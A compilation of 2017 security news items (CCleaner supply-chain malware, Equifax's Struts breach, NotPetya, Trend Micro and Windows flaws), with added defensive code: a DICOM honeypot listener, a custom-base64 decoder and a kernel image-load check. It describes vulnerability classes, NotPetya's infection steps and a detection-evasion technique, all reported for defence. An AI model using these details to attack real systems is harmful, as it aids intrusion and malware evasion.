When there’s no opportunity to install a security solution directly on the device itself (sometimes warranties prohibit any modifications at the operating system level), alternative options for detecting and/or confounding evildoers should be found. We discussed one of these options in the article titled “Deceive in Order to Detect”.

The defending party may prepare a set of dedicated traps, which consist of LAN nodes that simulate medical equipment. Any unauthorized access to them may serve as a signal that someone has compromised the network and that the IT department of the medical institution should take appropriate action.
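One way to build such a trap, as an added illustration that is not Kaspersky’s code: a decoy node that speaks just enough of the DICOM upper-layer protocol to parse an incoming A-ASSOCIATE-RQ, raise an alert (nothing legitimate should ever associate with it), and reject the association. The PDU layout follows DICOM PS3.8; the AE titles, addresses and allow-list are constructed sample values.

```python
"""Decoy DICOM node: parse an A-ASSOCIATE-RQ and alert on every attempt.

Added illustration for recommendation #5; not Kaspersky's code. The PDU
layout follows the DICOM upper-layer protocol (PS3.8: A-ASSOCIATE-RQ is
type 0x01, A-ASSOCIATE-RJ is type 0x03). AE titles, addresses and the
allow-list below are constructed values.
"""
import socket
import struct
from dataclasses import dataclass

PDU_A_ASSOCIATE_RQ = 0x01
PDU_A_ASSOCIATE_RJ = 0x03
FIXED_RQ_LEN = 74  # 6-byte PDU header + 68 fixed bytes before variable items

# Constructed allow-list: AE titles that legitimately open associations on this LAN.
EXPECTED_CALLING_AE = {"PACS01", "WS-RADIOLOGY"}


@dataclass
class AssociateRequest:
    called_ae: str
    calling_ae: str
    protocol_version: int


def parse_associate_rq(pdu: bytes) -> AssociateRequest:
    """Decode the fixed fields of an A-ASSOCIATE-RQ PDU."""
    if len(pdu) < FIXED_RQ_LEN:
        raise ValueError("PDU too short for A-ASSOCIATE-RQ")
    pdu_type, _reserved, pdu_len = struct.unpack(">BBI", pdu[:6])
    if pdu_type != PDU_A_ASSOCIATE_RQ:
        raise ValueError(f"not an A-ASSOCIATE-RQ (type 0x{pdu_type:02x})")
    if pdu_len + 6 != len(pdu):
        raise ValueError("PDU length field does not match the bytes received")
    version = struct.unpack(">H", pdu[6:8])[0]
    # Bytes 10-25: called AE title, 26-41: calling AE title, both space padded.
    called = pdu[10:26].decode("ascii", "replace").rstrip()
    calling = pdu[26:42].decode("ascii", "replace").rstrip()
    return AssociateRequest(called, calling, version)


def build_associate_rq(called_ae: str, calling_ae: str, items: bytes = b"") -> bytes:
    """Build a minimal A-ASSOCIATE-RQ; used here only to construct sample input."""
    body = struct.pack(">HH", 1, 0)            # protocol version 1, reserved
    body += called_ae.encode("ascii").ljust(16)
    body += calling_ae.encode("ascii").ljust(16)
    body += b"\x00" * 32 + items               # reserved block, then variable items
    return struct.pack(">BBI", PDU_A_ASSOCIATE_RQ, 0, len(body)) + body


def build_associate_rj() -> bytes:
    """A-ASSOCIATE-RJ with result=1 (rejected-permanent), source=1, reason=1."""
    return struct.pack(">BBIBBBB", PDU_A_ASSOCIATE_RJ, 0, 4, 0, 1, 1, 1)


def assess(req: AssociateRequest, src_ip: str) -> dict:
    """Every association with the decoy is an alert; an unknown calling AE
    title (no real modality or PACS would use it) makes it high severity."""
    reasons = ["association attempt against decoy node"]
    severity = "medium"
    if req.calling_ae not in EXPECTED_CALLING_AE:
        reasons.append("calling AE title not in allow-list")
        severity = "high"
    return {"src": src_ip, "called_ae": req.called_ae,
            "calling_ae": req.calling_ae, "severity": severity, "reasons": reasons}


def _recv_exact(conn: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def recv_pdu(conn: socket.socket) -> bytes:
    """Read one PDU: the 6-byte header, then the byte count it announces."""
    header = _recv_exact(conn, 6)
    length = struct.unpack(">I", header[2:6])[0]
    if length > 1 << 20:
        raise ValueError("oversized PDU")
    return header + _recv_exact(conn, length)


def serve_decoy(host: str = "0.0.0.0", port: int = 11112) -> None:
    """Listen on the registered DICOM port, alert on every attempt, reject it."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen()
        while True:
            conn, (ip, _port) = srv.accept()
            with conn:
                try:
                    alert = assess(parse_associate_rq(recv_pdu(conn)), ip)
                    conn.sendall(build_associate_rj())
                except (ValueError, ConnectionError) as exc:
                    alert = {"src": ip, "severity": "medium",
                             "reasons": [f"malformed DICOM traffic: {exc}"]}
                print(alert)  # forward to the SIEM in a real deployment
```

Calling serve_decoy() starts the listener; the alert dicts are what an IT department would route to its monitoring for the isolated medical segment.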

There are numerous methods for detecting malicious activity, and there is no sense in listing all of them as recommendations. Every IT department bases its choice of technology, products, and strategies for providing informational security on a large number of factors (the network size, resource priorities, available finances, etc.). Still, it is important to remember the main thing, which is that a lack of protection in medical infrastructure may cost the lives of patients.


Dangerous flaws threaten Windows users

18.9.2017 Novinky/Bezpečnost Vulnerabilities
Several critical flaws have been discovered in Microsoft products. They concern the Windows operating system itself, or its integral components such as the .NET Framework. Hackers can exploit the flaws to attack someone else’s computer.
It should be stressed right away that Microsoft has already released out-of-band security patches for the discovered flaws. Users can therefore defend themselves relatively easily.

Many users underestimate the importance of installing updates, so the number of unpatched machines can relatively easily climb to several million. It is precisely such machines, those without the updates installed, that their owners leave at the mercy of hackers.

They take control of the system
The flaws are mainly contained in the Windows Server 2008 operating system. As its name suggests, it is intended primarily for servers. However, users of ordinary computers should also be on guard, because the security holes are present in the .NET Framework as well. That is commonly used in the desktop versions of the system from the American computer giant too, including the latest Windows 10.

All of the flaws are labelled critical. Put simply, this means that because of the flaw, hackers can smuggle practically any malicious code into the attacked system. They can thus easily take control of the entire computer.

Users should therefore not delay installing the updates under any circumstances. They are available through the Windows Update service, which is an integral part of the Windows operating system.

People who use automatic updates do not need to do anything.


CyberGRX Partners With BitSight to Address Supply Chain Risks
18.9.2017 securityweek Cyber
Partnership Integrates BitSight’s Security Ratings Capabilities With CyberGRX Third-Party Cyber Risk Exchange

The iconic Target breach of 2013 brought attention to the threat from third-party suppliers -- the supply chain. Target was breached after its HVAC supplier, Fazio Mechanical Services, had itself been breached and had its credentials for accessing its customer stolen.

This threat has become more difficult and more complex as digital transformation has increased and cloud service providers have boomed. A single enterprise can now use several thousand different cloud services. According to Gartner research, a large enterprise's network of vendors, partners, contractors and customers all with access to the corporate network can easily run into the tens of thousands. Any one of these can potentially introduce an unseen risk.

Managing this risk manually is impossible to do effectively -- and several specialist companies have evolved to provide various degrees of automation. SecurityScorecard and BitSight are two companies that provide analyses of third-party vendors by analyzing their external face.

CyberGRX (GRX stands for global risk exchange) takes a different approach -- it provides a 'risk exchange' based on a storehouse of validated third party risk assessments. According to CEO Fred Kneip, the firm is the brainchild of Jay Leek -- then at Blackstone. "Jay was thinking about the inefficiencies of third party risk management across his portfolio. In an ad-hoc survey of his portfolio companies, he found that 90 of his 115 portfolio companies were using the exact same vendor. Fifty of those were doing a full blown assessment of that vendor every year."

CyberGRX is the result of that observation. Rather than do 50 risk assessments of one vendor, do one assessment and share it across fifty companies. Where CyberGRX differs from SecurityScorecard and BitSight is that its risk assessments are internal rather than external affairs -- the former looks at processes and controls in relation to vulnerabilities, while the latter looks at the third-party's internet face.

CyberGRX and BitSight have now recognized the potential synergy between the two approaches.

On Monday they announced a partnership. "BitSight is a leader of the security ratings market, and their ability to continuously rate the security performance of third parties from an outside-in perspective will strengthen the CyberGRX Exchange," said Kneip. "Combining their proven non-intrusive approach to evaluating risk and security performance with the inside-out view our platform provides is a powerful proposition for customers: a comprehensive, continuous, 360-degree view of third-party cyber risk exposure."

"Enterprises today require access to accurate, continuous and actionable information about third-party cyber risk," added Jacob Olcott, VP of strategic partnerships at BitSight. "CyberGRX helps to solve that problem for companies across the world, and our security ratings provide the unique, objective data that organizations need to scale their third-party risk programs and make more informed business decisions."

CISOs now have somewhere to go to rate the risk associated with their supply chain without having to spend hours every day poring over vendor-supplied spreadsheets or questionnaires, or ignoring the risk altogether through lack of time and manpower.

BitSight has raised more than $90 million in funding to-date, including $40 million in Series C financing in September 2016. Headquartered in Cambridge, Massachusetts, it was founded in 2011.

CyberGRX closed a $20M Series B funding round in April 2017. Headquartered in Denver, Colorado, it was founded in July 2016.


Threat Report Says 1 in 50 iOS Apps Could Leak Data
18.9.2017 securityweek Apple
A new global threat report for the mobile ecosystem shows that iOS provides a bigger threat than is often perceived. While the insecurities of the Android operating system are well-documented, the report notes that 1 in 50 iOS apps used in enterprise environments could potentially leak sensitive data.

Zimperium, a firm that provides next-gen machine learning endpoint protection for mobile devices, published its Global Threat Report Q2-2017 (PDF) on Friday.

During the second quarter -- April 1 to June 30, 2017 -- Zimperium's telemetry detected three specific threat categories to the mobile ecosystem. It describes them as device threats and risks (such as unpatched vulnerabilities), network threats (threats delivered via the cell network), and app threats (malware, spyware, adware and leaky apps on devices).

The threat from vulnerabilities in the iOS and Android operating systems has grown dramatically over the last few years. In 2014, there were fewer than 200 CVEs registered. By 2016, this had rocketed to around 600. This year (2017) there have already been more CVEs registered than for the whole of 2016.

It is not the operating systems becoming less secure -- it is more likely that both attackers and researchers are paying greater attention because of the increasing use of both iOS and Android in the corporate environment. "Cyber criminals are more likely to take the path of least resistance," notes the report, "and enterprise data is most vulnerable via mobile devices since most of time spent is away from secure networks, on public Wi-Fi and on apps that IT and security do not control or administer." It adds that "U.S. consumers now spend over 5 hours per day on mobile devices."

Unpatched vulnerabilities are as much a threat to mobile devices as they are to traditional devices. Unsurprisingly, given the fragmented nature of the Android market, Zimperium found that 94% of Android devices are using an outdated version of the OS. More surprising, however, is that 23% of iOS devices are also outdated. Despite the more timely and simple update process for iOS, Zimperium found that 1 in 5 Apple devices had not been updated 45 days after the update was readily available.

"The most concerning risks associated with iOS devices were malicious configuration profiles and 'leaky apps'," says Zimperium. These could ultimately allow a remote connection to control the device or siphon data without the user's knowledge.

The most serious of the network threats comes from man-in-the-middle (MITM) attacks. Zimperium's telemetry shows that 5% of all devices detected an attacker's reconnaissance scan, and that 80% of these subsequently received a MITM attack. "This is the most severe type of network attack," says the report, "since it is usually invisible to a user. Unless a user has a mobile threat defense app that can detect the attack on his/her device in real-time (e.g., zIPS), their wireless connection can be rerouted to a proxy and their data may be compromised."

While the threat of malicious apps and malware on the Android ecosystem is well-known and chronicled, Zimperium found that the iOS ecosphere should not be considered secure. Zimperium's machine-learning anomaly detection engine scanned 50,000 iOS applications present on enterprise users' iOS devices.

While it found that only 1% of the Apple devices had malware present, it found that nearly 1 in 5 devices had apps able to retrieve private information like passwords and the device's Unique Device Identifier, UDID. It also found that approximately 3% of the apps were using weak encryption or hashing algorithms -- like MD2 -- which are not considered secure for passing private data, payment data or in-app purchases.

Zimperium found seven specific iOS app threats: malware; keychain sharing; MD2 encryption; private frameworks; private info URL; UDID reading; and the ability to read private information during a public USB recharge. It found that 2.2% of the analyzed apps have at least one of these issues. "This is a significant concern to enterprises since 1 of 50 apps is potentially leaking data to third parties," says Zimperium.

Zimperium has raised $60 million through several rounds of funding since the company was founded in 2010.


Microsoft Extends Office Bounty Program
18.9.2017 securityweek Safety
Microsoft has announced an extension to its Microsoft Office Bounty Program, which is now set to run until December 31, 2017.

Launched in mid-March 2017, the bounty program was initially set to run until June 15, 2017, promising payouts between $6,000 and $15,000, depending on the discovered vulnerability’s severity and type. The program was launched for Office Insider Builds on Windows.

Microsoft now says that researchers can submit their bug reports until December 31, 2017, and that the extension is retroactive for any cases submitted during the interim. The company is looking for issues in the Office Insider Builds, which provide users with early access to new Office capabilities and security innovations.

“The engagement we have had with the security community has been great and we are looking to continue that collaboration on the Office Insider Builds on Windows. This program represents a great chance to identify vulnerabilities prior to broad distribution,” Phillip Misner, Principal Security Group Manager, Microsoft Security Response Center, notes in a blog post.

Participating researchers can earn the maximum bug reward of $15,000 for vulnerabilities such as Elevation of privilege via Office Protected View sandbox escape; Macro execution by bypassing security policies to block Office macros in Word, Excel, and PowerPoint; and Code execution by bypassing Outlook’s automatic attachment block policies for a predefined set of extensions.

Only high quality reports on these types of vulnerabilities will be awarded the maximum payout. Low quality reports, the company says, won’t be awarded more than $9,000. Proof of concept is required for reports to be eligible, but a functioning exploit isn’t, Microsoft explains in the bounty program’s terms page.

Eligible submissions should identify “an original and previously unreported vulnerability in the current Office Insider build on a fully patched Windows 10 desktop,” the tech giant says. Submissions that can be reproduced on the previous build but not on the current aren’t considered eligible.

Microsoft also notes that “the first eligible external report received on an internally known issue under active development will receive a maximum of $1,500.”

Participating researchers should send their submissions to secure@microsoft.com.


Millions Download Maliciously Modified PC Utility
18.9.2017 securityweek Virus
Infected CCleaner Utility Highlights Dangers of Software Supply Chain Attacks

More than 2 million users are estimated to have downloaded a maliciously modified version of a software utility owned by antivirus firm Avast.

The affected application, CCleaner, helps users perform routine maintenance on their systems, and provides functionality such as temporary files deletion, performance optimization analysis, and application management. Developed by Piriform Ltd, which was acquired by Avast in July, the software had around 2 billion total downloads as of November 2016.

The infected CCleaner versions include 32-bit CCleaner v5.33.6162, released on August 15, and CCleaner Cloud v1.07.3191, which was released on August 24. The issue was discovered last week, nearly a month after the infected application was made available for download.

No information on how the compromise happened has been provided as of now, but Cisco Talos security researchers discovered that the infected CCleaner installers were signed with a valid certificate and were being hosted directly on CCleaner's download server.

“The presence of a valid digital signature on the malicious CCleaner binary may be indicative of a larger issue that resulted in portions of the development or signing process being compromised. Ideally this certificate should be revoked and untrusted moving forward,” Cisco says.

The installers were infected with malware known as Floxif and were modified so as to execute the malicious code during the legitimate application’s installation process. The malicious code includes steps designed to evade detection, and terminates execution if the user doesn’t have admin privileges. It also uses a Domain Generation Algorithm (DGA).

The malware was designed to gather various data from the infected systems, including computer name, IP address, list of installed software, list of active software, list of network adapters, and send it to a third-party server in the United States, Piriform reveals. According to the company, this non-sensitive type of data is the only data that was sent to the server.
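Piriform’s description of the beacon (above and in the earlier report: collected data “encrypted and encoded by base64 with a custom alphabet”, then POSTed to a hardcoded IP) is the kind of thing an analyst has to undo when reconstructing what left a host. The helper below is an added example, not Piriform’s, Avast’s or Talos’ code; the alphabet and the sample report are constructed for illustration and are not the real malware’s, which would have to be recovered from the sample’s own decoding routine.

```python
"""Decode a blob that was base64-encoded with a custom (permuted) alphabet.

Added analyst helper for the CCleaner reports; not code from Piriform, Avast
or Talos. SAMPLE_ALPHABET and SAMPLE_REPORT are constructed values, not the
real malware's alphabet or data format.
"""
import base64
import binascii
import string

STANDARD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# Constructed sample alphabet: a permutation of the standard 64 symbols.
SAMPLE_ALPHABET = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210/+"

# Constructed sample of what a decoded beacon might contain (key=value lines,
# mirroring the categories the reports list: host name, privileges, bitness, processes).
SAMPLE_REPORT = b"computer=LAB-WS07\nadmin=1\nx64=0\nprocs=explorer.exe;ccleaner.exe\n"


def _check_alphabet(alphabet: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("custom alphabet must contain 64 distinct characters")


def decode_custom_b64(blob: str, alphabet: str, pad: str = "=") -> bytes:
    """Map each custom symbol back to its standard base64 symbol, then decode."""
    _check_alphabet(alphabet)
    table = str.maketrans(alphabet + pad, STANDARD_ALPHABET + "=")
    standard = blob.strip().translate(table)
    # Some samples drop the padding; restore it so b64decode accepts the text.
    standard += "=" * (-len(standard) % 4)
    try:
        return base64.b64decode(standard, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"blob is not valid base64 under this alphabet: {exc}") from exc


def encode_custom_b64(data: bytes, alphabet: str, pad: str = "=") -> str:
    """Inverse of decode_custom_b64; used here to build sample input."""
    _check_alphabet(alphabet)
    table = str.maketrans(STANDARD_ALPHABET + "=", alphabet + pad)
    return base64.b64encode(data).decode("ascii").translate(table)


def parse_report(plaintext: bytes) -> dict:
    """Split a decoded key=value report into a dict (constructed format)."""
    fields = {}
    for line in plaintext.decode("utf-8", "replace").splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields
```

Decoding the same blob with the standard alphabet yields unrelated bytes, which is exactly why a custom alphabet defeats naive "just base64-decode it" triage.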

Piriform also claims to have taken the necessary steps to ensure that its CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 users were safe, all while working with U.S. law enforcement to shut down the server, which was accomplished on Sept. 15.

The company says it worked with download sites to remove CCleaner v5.33.6162, it pushed a notification to update CCleaner users to v5.34, and also automatically updated CCleaner Cloud users from v1.07.3191 to 1.07.3214, in addition to delivering an automatic update to Avast Antivirus users.

“At this stage, we don’t want to speculate how the unauthorized code appeared in the CCleaner software, where the attack originated from, how long it was being prepared and who stood behind it. The investigation is still ongoing,” Paul Yung, VP, Products, Piriform, notes in a technical post detailing the incident.

The company says that only around 3% of the CCleaner users have been impacted by the incident. In July, the application had over 130 million users worldwide, including 15 million Android users. Responding to an email inquiry from SecurityWeek, an Avast spokesperson said that an estimated 2.27 million users have downloaded the infected CCleaner iterations.

“We estimate that 2.27 million users had the v5.33.6162 software, and 5,010 users had the v1.07.3191 of CCleaner Cloud installed on 32-bit Windows machines. We believe that these users are safe now as our investigation indicates we were able to disarm the threat before it was able to do any harm,” the company official said.

While analyzing the domains associated with the infection, Cisco discovered an increase in activity following the August 15 release of the infected CCleaner variant. The company also notes that the antivirus detection for the threat was very low at the time of analysis.

Impacted users are advised to update to CCleaner v5.34 as soon as possible. They should also scan their systems with an anti-virus solution to remove any malicious code that might still be present. According to Cisco, users should consider restoring their machines to a state before August 15, 2017, or even perform a full reinstall.


Flaws Patched in Trend Micro Mobile Security for Enterprise
18.9.2017 securityweek Vulnerability
A patch released last week by Trend Micro for its Mobile Security for Enterprise product resolves several vulnerabilities, including remote code execution issues rated critical and high severity.

Trend Micro Mobile Security for Enterprise is designed to provide organizations visibility and control over the mobile devices, applications and data used by their employees.

Researchers Steven Seeley of Offensive Security and Roberto Suggi Liverani discovered that the product is affected by unrestricted file upload, authentication bypass, SQL injection and proxy command injection vulnerabilities. The experts reported the security holes to Trend Micro via the security firm’s Zero Day Initiative (ZDI).

While there are only four types of vulnerabilities, ZDI published over 70 different advisories as each flaw affects more than one function.

The most severe issue, with a CVSS score of 9 or 10, is CVE-2017-14078, a SQL injection that allows authenticated and in some cases unauthenticated attackers to execute arbitrary code with SYSTEM privileges.

An authentication bypass vulnerability affecting Mobile Security for Enterprise, CVE-2017-14080, has been classified as high severity.

“The specific flaw exists within the initialization of the users table in the tmwf database. When processing an attempt to login a user by an email address, the system can bypass password authentication. An attacker can leverage this vulnerability to escalate privileges to those of an authenticated user,” ZDI said in its advisory.

An authenticated attacker can also execute arbitrary code by exploiting a medium severity flaw related to the modTMCSS Proxy functionality (CVE-2017-14081). Finally, an authenticated attacker can upload arbitrary files and execute code by abusing various file upload features that fail to properly validate user-supplied data (CVE-2017-14079).

The vulnerabilities were reported to the vendor in mid-May and were patched last week with the release of version 9.7 Patch 3.

Trend Micro pointed out that exploiting these vulnerabilities typically requires physical or remote access to a vulnerable system, but the company strongly encourages customers to apply the patch as soon as possible.


Equifax Shares More Details About Breach
18.9.2017 securityweek CyberCrime
Equifax has shared more details about the recent breach that affects roughly 143 million U.S. consumers, including how it discovered the unauthorized access and the number of individuals impacted by the incident in the United Kingdom.

The credit reporting agency announced on Friday that Chief Security Officer Susan Mauldin and Chief Information Officer David Webb had retired from the company effective immediately, and Russ Ayres and Mark Rohrwasser have been appointed interim CSO and CIO, respectively.

Many rushed to point out last week that Mauldin’s LinkedIn profile showed she was a music major with no background in cyber security or even technology. Mauldin has since made her profile private.

“Some people mock Equifax's CSO's music masters degree, however I doubt that many professional cybercriminals have any masters degree at all,” said Ilia Kolochenko, CEO of High-Tech Bridge. “Therefore I'd refrain from judging someone's skills only by his or her education. Only a scrupulous and rigorous investigation can point towards the people who should be responsible and liable for this disastrous breach.”

Equifax also revealed that the breach affected less than 400,000 U.K. consumers. Their data had been stored in the United States due to a “process failure” between 2011 and 2016. It’s still unclear how many Canadians are impacted by the breach.

The company discovered the intrusion on July 29 after its security team noticed suspicious traffic to a web application associated with its U.S. dispute portal. The suspicious traffic was blocked, but more unauthorized activity was detected the following day, which led to the decision to take the affected web app offline.

That was when Equifax’s security team discovered that the attackers had exploited an Apache Struts flaw to access its systems on May 13. The vulnerability in question, CVE-2017-5638, has been exploited in the wild since the first half of March.

Equifax said its team had known about the Struts vulnerability since it was disclosed and it took steps to patch systems. The organization is still reviewing the facts in an effort to determine why the dispute portal remained unpatched. FireEye-owned Mandiant has been called in to assist in conducting a comprehensive forensic investigation.

“The word patch is a bit inappropriate for this problem, since what Equifax would have had to do is replace the vulnerable Struts library with the latest one,” explained Jeff Williams, co-founder and CTO at Contrast Security. “Because this flaw has been in the Struts library for many years, there have been many other changes. That means that Equifax would have had significant rewriting to do in order to update. The process of rewriting, retesting, and redeploying can take months.”

“I think it’s outrageous that companies haven’t deployed the technology they need to protect applications from vulnerabilities during development and from attacks in operations,” Williams told SecurityWeek. “Companies that have been relying on legacy application security tools from the early 2000’s to protect their enterprise have a very false sense of their security. Those tools are simply too slow, inaccurate, and manual intensive to provide protection for modern applications and modern threats.”


ZLAB Malware Analysis Report: NotPetya
18.9.2017 securityweek Ransomware

I’m proud to share with you the first report produced by Z-Lab, the Malware Lab launched by the company CSE CybSec. Enjoy the Analysis Report NotPetya.
As most of you already know, I officially presented my new Co a couple of months ago; CybSec Enterprise is its name, and we have already started to work on strategic projects that we will reveal soon … meantime I apologize for the website, which is still under construction.

We have already launched a malware lab, let’s call it Z-Lab, composed of a group of skilled researchers and led by Eng. Antonio Pirozzi.

It’s a pleasure for me to share with you one of the first analyses that we have recently conducted, on the NotPetya ransomware.

We have dissected the ransomware and discovered interesting details that are included in our report.

Below is the abstract; the detailed report is available for free on our website.

Abstract
Because many users fail to update their machines, many threats spread by exploiting well-known vulnerabilities. This is what happened with the propagation of the NotPetya ransomware, which infected a large number of users, mostly in Eastern Europe. This malware uses a famous exploit developed by the NSA, EternalBlue, which relies on a vulnerability (MS17-010; CVE-2017-0143) in the Windows implementation of the SMB protocol. The exploit was leaked in April 2017 and was first used by another malware, WannaCry, which caused more damage than NotPetya.

NotPetya could be confused with the Petya ransomware (which spread in 2016) because of its behavior after the system reboot, but the two differ: NotPetya is much more complex. In fact, Petya’s best-known characteristic is the encryption of the Windows MBR and MFT, whereas NotPetya propagates itself across the network as a worm.

[Figure: scheme of the malware’s behavior]

In the above figure, we have a scheme of the malware’s behavior. The first phase is the search for a file that acts as a kill-switch, to avoid infecting machines that are already compromised. The next steps concern the actual infection, summarized below:

Take disk control
Replace the original MBR with its own
Schedule a reboot after an hour
Encrypt user files and concurrently spread itself using the EternalBlue exploit
After the reboot, the next step is the fake CHKDSK routine, very similar to Petya’s, during which the malware encrypts the MFT. After that, we no longer see the characteristic Petya skull but go directly to the ransom note screen, which includes the e-mail address of the malware writer and the Bitcoin address for the ransom payment.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/NotPetya-report.pdf


The hacker Kuroi’SH defaced the official Google Brazil domain
18.9.2017 securityaffairs Hacking

A hacker using the online moniker of ‘Kuroi’SH’ defaced the Google Brazil domain on Tuesday afternoon, this isn’t the first high-profile target he breached.
A hacker using the online moniker of ‘Kuroi’SH’ defaced the official Google Brazil domain on Tuesday afternoon. The defaced page displayed a message greeting his friends for the successful attack on such a high-profile target.

“It is a great moment to die. Hacked by Kuroi’SH! Two Google at once, I don’t even care; f**k the jealous hates such as Nofawkx. Two Google at once world record idgaf :D. Greets to my friends Prosox & Shinobi h4xor.”

Below are the deface page uploaded by the hacker and a video PoC of the hack:

[Image: Google Brazil defaced]


Kuroi’SH successfully uploaded a deface page that remained on the domain for more than 30 minutes.

Kuroi’SH, who describes himself as “a half gray hat and white hat,” explained that he was also able to control Google Paraguay but didn’t have time to do it.

I reached out to Kuroi’SH to ask why he defaced the Google Brazil domain; he told me that it was a demonstrative hack meant to show that everything can be hacked.

He highlighted the importance of cyber security and the risks every online company faces if it underestimates cyber threats.

Google Brazil also acknowledged the defacement; the company clarified that its systems were not hacked.

“Google has not been hacked. DNS servers may have suffered an attack, redirecting to other sites.” states Google Brazil.

Google Brasil (@googlebrasil), 9:06 PM - Jan 3, 2017: “Google was not hacked. DNS servers may have suffered an attack, redirecting to other sites. Suggestion: https://goo.gl/6icAam”
Shortly after the attack, some Brazilian media outlets reported that the hacker had also defaced the Google Maps and Google Translate domains, but Kuroi’SH has denied any involvement in other attacks.

My readers know Kuroi’SH very well: in 2015, he defaced NASA subdomains and published a pro-Palestinian message.

Such attacks can be very dangerous because hackers targeting DNS can redirect visitors to websites set up to deliver malware or to phishing sites … do not underestimate them!


Unpatched Windows Kernel Bug Could Help Malware Hinder Detection

18.9.2017 thehackernews Virus

A 17-year-old programming error has been discovered in Microsoft's Windows kernel that could prevent some security software from detecting malware at runtime when loaded into system memory.
The security issue, described by enSilo security researcher Omri Misgav, resides in the kernel routine "PsSetLoadImageNotifyRoutine," which apparently impacts all versions of Windows operating systems since Windows 2000.
Windows has a built-in API, called PsSetLoadImageNotifyRoutine, that helps programs monitor if any new module has been loaded into memory. Once registered, the program receives notification each time a module is loaded into memory. This notification includes the path to the module on disk.
However, Misgav found that due to "caching behaviour, along with the way the file-system driver maintains the file name and a severe coding error," the function doesn't always return the correct path of the loaded modules.
What’s worse, Microsoft apparently has no plans to address the issue, as the software giant does not consider it a security vulnerability.
"This bug could have security implications for those who aren’t aware of its existence. We believe that if Microsoft does not plan on fixing this bug, they should at least explicitly warn developers about it in their documentation," says Tal Liberman, head of the research team at enSilo.
The researchers believe this "programmatic error" could theoretically be used by malware authors to bypass antivirus detection—especially those security products which rely on this API to check if any malicious code has been loaded into memory—using a "series of file operations" to mislead the scanning engine into looking at the wrong file.
So, if your endpoint detection and response products rely on this buggy API, you should either stop relying on it or implement the workaround proposed by the researchers to overcome the loophole.
In a separate blog post, Misgav advised software developers to use another Windows API (FltGetFileNameInformationUnsafe) to check the validity of the module's path using the file object parameter.
If the file exists, it is possible to verify that the file object being loaded into memory is indeed the same file that lies on disk.
For a more technical explanation, you can head on to enSilo's blog.
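The workaround as an added example (not enSilo’s or Microsoft’s code): an image-load callback that recovers the FILE_OBJECT from IMAGE_INFO_EX and asks the Filter Manager for the file’s normalized name, acting on that rather than on FullImageName. It assumes a WDK kernel driver linked against fltMgr.lib and passes NULL as the Filter Manager instance, which the API permits.

```c
#include <ntifs.h>
#include <fltKernel.h>

// Image-load callback that resolves the loaded module's name from the
// FILE_OBJECT instead of trusting the notified FullImageName. Added example,
// not enSilo's or Microsoft's code; assumes a WDK kernel driver linked against
// fltMgr.lib. Instance is passed as NULL (allowed by the API) because this
// driver is not itself a minifilter.
static VOID
ImageLoadNotify(_In_opt_ PUNICODE_STRING FullImageName,
                _In_ HANDLE ProcessId,
                _In_ PIMAGE_INFO ImageInfo)
{
    PIMAGE_INFO_EX infoEx;
    PFLT_FILE_NAME_INFORMATION nameInfo = NULL;
    NTSTATUS status;

    // Legacy notification without a FILE_OBJECT: the name cannot be verified,
    // so treat it as untrusted rather than scanning whatever path it names.
    if (!ImageInfo->ExtendedInfoPresent) {
        if (FullImageName != NULL) {
            DbgPrint("[imgload] pid=%p unverifiable: %wZ\n", ProcessId, FullImageName);
        }
        return;
    }

    // With ExtendedInfoPresent set, IMAGE_INFO is embedded in IMAGE_INFO_EX.
    infoEx = CONTAINING_RECORD(ImageInfo, IMAGE_INFO_EX, ImageInfo);
    if (infoEx->FileObject == NULL) {
        return;
    }

    // Ask the file system for the normalized name of the object actually mapped.
    status = FltGetFileNameInformationUnsafe(infoEx->FileObject,
                                             NULL,
                                             FLT_FILE_NAME_NORMALIZED |
                                             FLT_FILE_NAME_QUERY_DEFAULT,
                                             &nameInfo);
    if (!NT_SUCCESS(status)) {
        DbgPrint("[imgload] pid=%p name query failed: 0x%08X\n", ProcessId, status);
        return;
    }

    // Decide on nameInfo->Name; log when it disagrees with what the kernel reported.
    if (FullImageName == NULL ||
        RtlCompareUnicodeString(FullImageName, &nameInfo->Name, TRUE) != 0) {
        DbgPrint("[imgload] pid=%p MISMATCH, actual image: %wZ\n",
                 ProcessId, &nameInfo->Name);
    }

    FltReleaseFileNameInformation(nameInfo);
}

static VOID
DriverUnload(_In_ PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    PsRemoveLoadImageNotifyRoutine(ImageLoadNotify);
}

NTSTATUS
DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = DriverUnload;
    return PsSetLoadImageNotifyRoutine(ImageLoadNotify);
}
```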
In separate news, security researchers from Check Point reported a new attack technique, dubbed Bashware, which takes advantage of Windows’ built-in Linux subsystem to hide malware from most security solutions.


Malware attacks leverage the Hangul Word Processor and PostScript to spread malware
18.9.2017 securityaffairs Virus

Experts at Trend Micro reported malware attacks that leveraged the Hangul Word Processor (HWP) word processing application to target users.
It has happened again: attackers leveraged the Hangul Word Processor (HWP) word processing application to target users in South Korea.

The application is very popular in South Korea and has been exploited in several hacking campaigns against entities in the country.

In the recent attacks, the hackers use the Hangul Word Processor in association with PostScript, delivering the malware through emails containing malicious attachments.

“A branch of PostScript called Encapsulated PostScript exists, which adds restrictions to the code that may be run. This is supposed to make opening these documents safer, but unfortunately older HWP versions implement these restrictions improperly. We have started seeing malicious attachments that contain malicious PostScript, which is in turn being used to drop shortcuts (or actual malicious files) onto the affected system.” states the analysis published by Trend Micro.

